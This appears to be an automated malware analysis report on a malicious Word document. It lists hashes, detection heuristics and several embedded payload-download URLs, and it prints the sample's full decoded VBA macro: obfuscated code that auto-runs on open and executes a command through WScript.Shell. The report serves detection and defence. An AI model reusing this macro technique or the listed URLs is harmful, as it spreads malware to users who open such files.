Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7ecb23d000869ed9…

MALICIOUS

Office (OLE)

64.0 KB Created: 2019-01-16 21:24:00 Authoring application: Microsoft Office Word First seen: 2019-06-27
MD5: b34e47f4a9c90aee43a9096e64eb881a SHA-1: 4aa5d5b5ea7f7948ac779ae3968ff25cd664bafa SHA-256: 7ecb23d000869ed97dd1329b4989c29109cb1d0c336836258cb39f21570a9433
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains a VBA macro with an AutoOpen function, which is a common technique for malicious Office documents. The macro utilizes WScript.Shell and CreateObject to execute commands, specifically constructing the string "WscRipt.sHeLl" which strongly suggests an attempt to run Windows Script Host. This indicates the macro is likely designed to download and execute a secondary payload from the embedded URLs.

Heuristics 9

  • ClamAV: Doc.Malware.Generic-6818422-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6818422-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
     End Select
    XSS84 = "" + Downsized41 + blue15 + AutoLoanAccount4 + "WscRipt.sHeLl" + Liaison8 + payment82
       Select Case National91
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     End Select
    indexing17 = Array(International81, skyblue75, Awesome62, CreateObject("" + Incredible83 + Factors81 + XSS84).Run!("" + Executive88 + Namibia79 + copying52 + initiatives70.TextBox1 + invoice65 + proactive13, PGWAhWwuk), Cambridgeshire71, AwesomeCottonTable73, GuyanaDollar91)
       Select Case payment34
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "Marketing96"
    Sub autoopen()
    Mission97 = Research55
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://samix-num.com/BcFUhvDr@http://economiadigital.biz/NKq5eOZ@http://ftp.dailyigni In document text (OLE body)
    • http://migoshen.org/FNE1TVJjI@http://vanoostrom.org/w8yXb69h5In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4890 bytes
SHA-256: d58bc63444b91bae6c3d43940b5e3e46ea5cdbf00509346fde36f3b1a44c9f29
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "initiatives70"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Attribute VB_Name = "olive13"
Function reciprocal90()
On Error Resume Next
   Select Case Rubber92
         Case 210
            Rubber87 = CLng(641)
Accountability31 = EXE10
            pixel78 = CDate(Island53)
missioncritical8 = JBOD5
            website86 = Int(743)
         Case 276
tangible46 = helpdesk94
            RefinedPlasticCar27 = Cos(Operations63)
yellow25 = Alabama24
            knowledgebase17 = ChrB(941)
            repurpose53 = paradigm7
 End Select
   Select Case redefine63
         Case 40
            invoice79 = CLng(33)
payment62 = Buckinghamshire55
            generating32 = CDate(CostaRicanColon2)
interfaces29 = FantasticFrozenSalad91
            haptic17 = Int(529)
         Case 798
Station17 = LicensedSteelKeyboard15
            program22 = Cos(Sleek66)
Openarchitected16 = hardware27
            clearthinking15 = ChrB(627)
            Ergonomic51 = Islands42
 End Select
XSS84 = "" + Downsized41 + blue15 + AutoLoanAccount4 + "WscRipt.sHeLl" + Liaison8 + payment82
   Select Case National91
         Case 513
            seamless79 = CLng(632)
AwesomeSteelCheese49 = backend19
            Naira33 = CDate(bypass13)
AlgerianDinar74 = digital15
            GB34 = Int(336)
         Case 187
empower61 = Dynamic58
            compress31 = Cos(Adaptive10)
magenta74 = red33
            Inlet13 = ChrB(924)
            strategy28 = driver2
 End Select
   Select Case Product94
         Case 253
            partnerships84 = CLng(216)
Borders1 = infrastructures95
            optical37 = CDate(integrate84)
Colorado48 = Quality14
            Cotton85 = Int(324)
         Case 996
transmit75 = Buckinghamshire85
            content88 = Cos(Sleek52)
Lodge63 = Solutions75
            withdrawal93 = ChrB(870)
            webreadiness94 = optical68
 End Select
PGWAhWwuk = 0
   Select Case networks98
         Case 731
            Lake74 = CLng(926)
TimorLeste71 = Stream11
            networks43 = CDate(Land74)
Wyoming85 = XML88
            Assistant69 = Int(298)
         Case 74
Ranch25 = vertical42
            GenericSteelTable27 = Cos(mindshare70)
Tala37 = platforms99
            EthiopianBirr49 = ChrB(734)
            MoneyMarketAccount17 = leadingedge96
 End Select
   Select Case deposit47
         Case 505
            Data98 = CLng(947)
Pula76 = JBOD26
            Electronics50 = CDate(Directives93)
digital61 = THX19
            Gambia17 = Int(319)
         Case 449
Ergonomic98 = quantify7
            Cotton10 = Cos(connecting16)
Berkshire9 = Clothing55
            Director47 = ChrB(366)
            syndicate95 = NewMexico87
 End Select
indexing17 = Array(International81, skyblue75, Awesome62, CreateObject("" + Incredible83 + Factors81 + XSS84).Run!("" + Executive88 + Namibia79 + copying52 + initiatives70.TextBox1 + invoice65 + proactive13, PGWAhWwuk), Cambridgeshire71, AwesomeCottonTable73, GuyanaDollar91)
   Select Case payment34
         Case 187
            FantasticSteelBall12 = CLng(385)
RusticPlasticMouse34 = alarm31
            fullrange42 = CDate(Rubber80)
Officer99 = Berkshire10
            unleash32 = Int(738)
         Case 449
JSON69 = Cambridgeshire41
            RSS61 = Cos(Generic68)
FantasticGraniteGloves74 = SmallPlasticChicken28
            superstructure53 = ChrB(154)
            Avon42 = wireless14
 End Select
   Select Case streamline25
         Case 57
            r1080p8 = CLng(54)
extend65 = GenericCottonBall73
            withdrawal67 = CDate(Selfenabling50)
Toys97 = deposit30
            invoice89 = Int(805)
         Case 908
parse20 = whiteboard69
            Generic43 = Cos(Electronics91)
AntiguaandBarbuda21 = Sharable29
            withdrawal34 = ChrB(875)
            Fantastic66 = orchid16
 End Select
   Select Case Corporate43
         Case 789
            repurpose94 = CLng(703)
HandcraftedSteelShirt34 = Frozen36
            asynchronous23 = CDate(Frontline16)
COM10 = Industrial86
            AwesomeConcreteShirt37 = Int(179)
         Case 918
Cotton49 = circuit62
            multistate29 = Cos(Squares17)
directional22 = ivory47
            Granite98 = ChrB(745)
            bypass29 = Metal48
 End Select
End Function


Attribute VB_Name = "Marketing96"
Sub autoopen()
Mission97 = Research55
synergies78 = Array(Steel97, userfacing1, Park30, reciprocal90, TurkishLira30, dynamic33, wireless52)
input37 = deposit7
End Sub
Function Assistant78()
ShoesMovies40 = clientdriven19
End Function